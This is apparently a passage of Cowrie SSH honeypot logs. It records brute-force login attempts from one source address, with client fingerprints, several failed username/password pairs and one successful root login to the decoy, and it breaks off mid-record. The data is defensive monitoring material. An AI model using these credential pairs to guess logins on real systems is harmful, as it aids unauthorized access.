{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:02:51.286322Z","src_ip":"212.227.235.229","session":"7dc1296ddc46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45416,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e23fced2e16","protocol":"ssh","message":"New connection: 212.227.235.229:45416 (1.2.3.4:22) [session: 4e23fced2e16]","sensor":"my-vps","timestamp":"2025-08-28T08:03:01.108037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:01.110447Z","src_ip":"212.227.235.229","session":"4e23fced2e16"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:01.379071Z","src_ip":"212.227.235.229","session":"4e23fced2e16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63713,"dst_ip":"1.2.3.4","dst_port":22,"session":"83dda9fae52f","protocol":"ssh","message":"New connection: 212.227.235.229:63713 (1.2.3.4:22) [session: 83dda9fae52f]","sensor":"my-vps","timestamp":"2025-08-28T08:03:05.063599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:05.064602Z","src_ip":"212.227.235.229","session":"83dda9fae52f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:03:05.221959Z","src_ip":"212.227.235.229","session":"83dda9fae52f"}
{"eventid":"cowrie.login.failed","username":"user","password":"chloe","message":"login attempt [user/chloe] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:05.913468Z","src_ip":"212.227.235.229","session":"83dda9fae52f"}
{"eventid":"cowrie.login.failed","username":"user","password":"astros","message":"login attempt [user/astros] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:07.511055Z","src_ip":"212.227.235.229","session":"83dda9fae52f"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234567890q","message":"login attempt [user/1234567890q] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:08.659789Z","src_ip":"212.227.235.229","session":"83dda9fae52f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55688,"dst_ip":"1.2.3.4","dst_port":22,"session":"199d8a0432a3","protocol":"ssh","message":"New connection: 217.72.205.35:55688 (1.2.3.4:22) [session: 199d8a0432a3]","sensor":"my-vps","timestamp":"2025-08-28T08:03:09.698952Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:09.700100Z","src_ip":"217.72.205.35","session":"199d8a0432a3"}
{"eventid":"cowrie.login.failed","username":"user","password":"10101010","message":"login attempt [user/10101010] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:09.819524Z","src_ip":"212.227.235.229","session":"83dda9fae52f"}
{"eventid":"cowrie.login.failed","username":"user","password":"stephanie","message":"login attempt [user/stephanie] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:10.979720Z","src_ip":"212.227.235.229","session":"83dda9fae52f"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:12.313471Z","src_ip":"212.227.235.229","session":"83dda9fae52f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45154,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d3cc994b020","protocol":"ssh","message":"New connection: 212.227.235.229:45154 (1.2.3.4:22) [session: 6d3cc994b020]","sensor":"my-vps","timestamp":"2025-08-28T08:03:15.486404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:15.487997Z","src_ip":"212.227.235.229","session":"6d3cc994b020"}
{"eventid":"cowrie.login.success","username":"root","password":"temp","message":"login attempt [root/temp] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:03:16.541698Z","src_ip":"212.227.235.229","session":"7dc1296ddc46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45020,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d758873734e","protocol":"ssh","message":"New connection: 212.227.235.229:45020 (1.2.3.4:22) [session: 0d758873734e]","sensor":"my-vps","timestamp":"2025-08-28T08:03:21.615740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:21.623632Z","src_ip":"212.227.235.229","session":"0d758873734e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:22.069511Z","src_ip":"212.227.235.229","session":"6d3cc994b020"}
{"eventid":"cowrie.login.failed","username":"admin","password":"p@ssw0rd","message":"login attempt [admin/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:22.369723Z","src_ip":"212.227.235.229","session":"4e23fced2e16"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:23.587907Z","src_ip":"212.227.235.229","session":"0d758873734e"}
{"eventid":"cowrie.session.closed","duration":"23.2","message":"Connection lost after 23.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:24.310425Z","src_ip":"212.227.235.229","session":"4e23fced2e16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59384,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c199d57f916","protocol":"ssh","message":"New connection: 212.227.235.229:59384 (1.2.3.4:22) [session: 1c199d57f916]","sensor":"my-vps","timestamp":"2025-08-28T08:03:24.366212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:24.368993Z","src_ip":"212.227.235.229","session":"1c199d57f916"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:24.625736Z","src_ip":"212.227.235.229","session":"1c199d57f916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44976,"dst_ip":"1.2.3.4","dst_port":22,"session":"03622200c586","protocol":"ssh","message":"New connection: 212.227.235.229:44976 (1.2.3.4:22) [session: 03622200c586]","sensor":"my-vps","timestamp":"2025-08-28T08:03:25.140490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:25.143423Z","src_ip":"212.227.235.229","session":"03622200c586"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sh